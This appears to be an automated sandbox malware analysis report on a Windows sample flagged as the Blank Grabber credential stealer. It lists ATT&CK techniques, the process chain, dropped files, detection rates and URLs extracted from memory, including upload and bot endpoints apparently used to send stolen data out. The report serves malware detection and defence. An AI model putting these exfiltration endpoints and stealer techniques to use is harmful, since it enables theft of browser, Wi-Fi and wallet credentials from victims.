              Source: Yara matchFile source: 00000007.00000003.1689985178.000001E7C39E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: X9g8L63QGs.exe PID: 3396, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: X9g8L63QGs.exe PID: 3800, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI33962\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: X9g8L63QGs.exe PID: 3800, type: MEMORYSTR
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1BA450C0 bind,7_2_00007FFB1BA450C0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1BA460CC listen,7_2_00007FFB1BA460CC
              MITRE ATT&CK Matrix (digits in front of a technique are the badge the report's matrix attached to it, copied as extracted; techniques without digits carry no badge)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
              Execution: 241 Windows Management Instrumentation; 2 Native API; 122 Command and Scripting Interpreter; 3 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
              Persistence: 1 DLL Side-Loading; 2 Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
              Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 11 Process Injection; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
              Defense Evasion: 4 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 21 Obfuscated Files or Information; 11 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Modify Registry; 141 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 11 Process Injection
              Credential Access: 1 OS Credential Dumping; 1 Credentials In Files; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
              Discovery: 2 System Time Discovery; 3 File and Directory Discovery; 49 System Information Discovery; 251 Security Software Discovery; 2 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; Network Sniffing; Network Service Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
              Collection: 1 Archive Collected Data; 31 Data from Local System; 1 Email Collection; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
              Command and Control: 4 Ingress Tool Transfer; 21 Encrypted Channel; 4 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
              Impact: 1 Data Encrypted for Impact; 1 System Shutdown/Reboot; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
              Behavior Graph (ID: 1584308, Sample: X9g8L63QGs.exe, Startdate: 05/01/2025, Architecture: WINDOWS, Score: 100)
              Contacted hosts: ip-api.com (208.95.112.1:80, TUT-ASUS, United States); discord.com (162.159.137.232:443, CLOUDFLARENETUS, United States); blank-ivnd9.in
              Process chain: X9g8L63QGs.exe -> X9g8L63QGs.exe -> cmd.exe (three instances) and 31 other processes -> powershell.exe, conhost.exe, WMIC.exe, getmac.exe and 60 other processes -> csc.exe -> cvtres.exe
              Dropped files: rarreg.key (ASCII); unicodedata.pyd (PE32+); sqlite3.dll (PE32+); 16 other files (none is malicious); bexzy300.cmdline (Unicode); bexzy300.dll (PE32)
              Signatures shown on the graph: Sigma detected: Capture Wi-Fi password; Multi AV Scanner detection for submitted file; Yara detected Blank Grabber; 12 other signatures; Modifies Windows Defender protection settings; Adds a directory exclusion to Windows Defender; Removes signatures from Windows Defender; Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal browser information (history, passwords, etc); Suspicious powershell command line found; Uses cmd line tools excessively to alter registry or file data; Encrypted powershell cmdline option found; Tries to harvest and steal WLAN passwords; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes or reads registry keys via WMI; Loading BitLocker PowerShell Module

Source | Detection | Scanner | Label | Link
X9g8L63QGs.exe | 47% | ReversingLabs | Win64.Trojan.Leonem |
X9g8L63QGs.exe | 67% | Virustotal | | Browse
X9g8L63QGs.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\_MEI33962\VCRUNTIME140.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI33962\_bz2.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI33962\_ctypes.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI33962\_decimal.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI33962\_hashlib.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI33962\_lzma.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI33962\_queue.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI33962\_socket.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI33962\_sqlite3.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI33962\_ssl.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI33962\libcrypto-3.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI33962\libffi-8.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI33962\libssl-3.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI33962\python312.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI33962\select.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI33962\sqlite3.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI33962\unicodedata.pyd | 0% | ReversingLabs | |
              No Antivirus matches
Source | Detection | Scanner | Label | Link
https://api.anonfiles.com/uploadr | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discord.com | 162.159.137.232 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high
blank-ivnd9.in | unknown | unknown | false | | unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabX9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://github.com/Blank-c/BlankOBFX9g8L63QGs.exe, 00000007.00000003.1286894963.000001E7C3082000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1287219139.000001E7C29BD000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1287263536.000001E7C2D30000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1287314117.000001E7C2D32000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://www.avito.ru/X9g8L63QGs.exe, 00000007.00000002.1697474979.000001E7C32E0000.00000004.00001000.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/ac/?q=X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://api.gofile.io/getServerrzrX9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2C80000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1289606937.000001E7C2D42000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0X9g8L63QGs.exe, 00000004.00000002.1720049067.000001FB29ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.org/botX9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpfalse
                                  high
                                  https://www.ctrip.com/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#X9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://www.leboncoin.fr/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmpfalse
                                        high
                                        https://tools.ietf.org/html/rfc2388#section-4.4X9g8L63QGs.exe, 00000007.00000003.1462666866.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691006091.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445882054.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1482149453.000001E7C29FF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694260601.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1450291264.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1456637981.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64X9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://weibo.com/X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EBB000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EB4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                              high
                                              https://api.anonfiles.com/uploadX9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                https://www.msn.comX9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  high
                                                  https://nuget.org/nuget.exepowershell.exe, 00000014.00000002.1488439935.000002452B935000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1571908950.0000017524565000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1499829000.0000017515E59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1571908950.00000175246A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://discord.com/api/v9/users/X9g8L63QGs.exe, 00000007.00000002.1694449403.000001E7C2A80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      high
                                                      https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963X9g8L63QGs.exe, 00000007.00000002.1697306895.000001E7C3180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        high
                                                        http://cacerts.digiX9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://peps.python.org/pep-0205/X9g8L63QGs.exe, 00000007.00000002.1694449403.000001E7C2A80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.reddit.com/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000014.00000002.1444673168.000002451B8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1499829000.00000175144F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.amazon.ca/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3840000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLKX9g8L63QGs.exe, 00000007.00000003.1481477525.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445056949.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenameX9g8L63QGs.exe, 00000007.00000003.1279178659.000001E7C2577000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C2440000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyX9g8L63QGs.exe, 00000007.00000002.1697474979.000001E7C32E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C2440000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.ebay.co.uk/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000046.00000002.1499829000.0000017515DFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000014.00000002.1444673168.000002451BAEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.ebay.de/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000046.00000002.1499829000.0000017515DFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codeX9g8L63QGs.exe, 00000007.00000003.1279178659.000001E7C2577000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C24BC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://go.micropowershell.exe, 00000046.00000002.1499829000.00000175156AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerX9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.amazon.com/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3840000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://github.com/python/cpython/issues/86361.X9g8L63QGs.exe, 00000007.00000003.1688465803.000001E7C28C2000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1290104191.000001E7C2D9F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1290046859.000001E7C2E0D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694008349.000001E7C29A2000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C28C6000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691953051.000001E7C29A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://contoso.com/Iconpowershell.exe, 00000046.00000002.1571908950.00000175246A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://httpbin.org/X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sX9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drfalse
                                                                                                      high
                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduleX9g8L63QGs.exe, 00000007.00000002.1693650050.000001E7C2780000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1279203002.000001E7C2569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesX9g8L63QGs.exe, 00000007.00000002.1693650050.000001E7C2780000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.ecosia.org/newtab/X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brX9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3983000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1481477525.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C29E9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2FD4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1431878807.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1457946992.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445056949.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1454766245.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1423636617.000001E7C2FD4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3A20000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445232213.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.youtube.com/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://allegro.pl/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3884000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000046.00000002.1499829000.0000017515DFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1695698107.000001E7C2EAE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1692076374.000001E7C2EBC000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1692121496.000001E7C2EAD000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1695917994.000001E7C2EBD000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691987395.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syX9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://MD8.mozilla.org/1/mX9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C3400000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.python.org/psf/license/X9g8L63QGs.exe, 00000007.00000002.1713477885.00007FFB0C724000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                            high
                                                                                                                            https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngp?sX9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.bbc.co.uk/X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://bugzilla.moX9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3884000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3840000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://github.com/python/importlib_metadata/wiki/Development-MethodologyX9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C3380000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://api.anonfiles.com/uploadrX9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2C80000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1289606937.000001E7C2D42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    http://tools.ietf.org/html/rfc6125#section-6.4.3X9g8L63QGs.exe, 00000007.00000002.1697474979.000001E7C32E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000014.00000002.1444673168.000002451BAEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://google.com/mailX9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1462666866.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691353377.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691006091.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445882054.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1482149453.000001E7C29FF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694260601.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1450291264.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1456637981.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://packaging.python.org/specifications/entry-points/X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C339C000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1697474979.000001E7C32E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.python.org/psf/license/)X9g8L63QGs.exe, 00000007.00000002.1713477885.00007FFB0C620000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                                              high
URL | Source | Malicious | Reputation
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py | X9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmp | false | high
https://www.google.com/ | X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C346C000.00000004.00001000.00020000.00000000.sdmp | false | high
https://www.iqiyi.com/ | X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmp | false | high
https://foss.heptapod.net/pypy/pypy/-/issues/3539 | X9g8L63QGs.exe, 00000007.00000002.1697306895.000001E7C3180000.00000004.00001000.00020000.00000000.sdmp | false | high
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900. | X9g8L63QGs.exe, 00000007.00000003.1462666866.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691006091.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445882054.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1482149453.000001E7C29FF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694260601.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1450291264.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1456637981.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp | false | high
